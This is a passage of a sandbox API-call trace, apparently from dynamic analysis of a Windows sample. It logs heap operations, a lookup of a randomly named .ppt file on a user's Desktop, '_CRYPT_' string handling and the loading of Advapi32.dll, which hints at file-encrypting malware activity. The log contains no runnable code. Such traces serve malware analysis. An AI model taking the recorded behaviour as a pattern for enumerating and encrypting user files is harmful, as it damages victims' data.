hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0137.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0137.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0137.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0137.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0137.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.528] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/aycVRCc36.ppt", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26b597e0, ftCreationTime.dwHighDateTime=0x1d5e9c2, ftLastAccessTime.dwLowDateTime=0xbcec7dd0, ftLastAccessTime.dwHighDateTime=0x1d5ee74, ftLastWriteTime.dwLowDateTime=0xbcec7dd0, ftLastWriteTime.dwHighDateTime=0x1d5ee74, nFileSizeHigh=0x0, nFileSizeLow=0xffed, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="aycVRCc36.ppt", cAlternateFileName="AYCVRC~1.PPT")) returned 0xa87250 [0137.528] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0137.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0137.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0137.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0137.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0137.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0137.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0137.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.528] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0137.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0137.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0137.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0137.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0137.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0137.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0137.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0137.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0137.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0137.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0137.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0137.529] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0137.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0137.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0137.529] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0137.529] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0137.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0137.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0137.529] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0137.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0137.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0137.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0137.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0137.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0137.530] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0137.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0137.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0137.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0137.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0137.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0137.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.531] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.531] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.531] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0137.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0137.531] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0137.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0137.532] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.532] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0137.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0137.533] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0137.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0137.533] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0137.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0137.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0137.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0137.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.534] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0137.534] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0137.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.534] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0137.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0137.535] HeapFree (in: 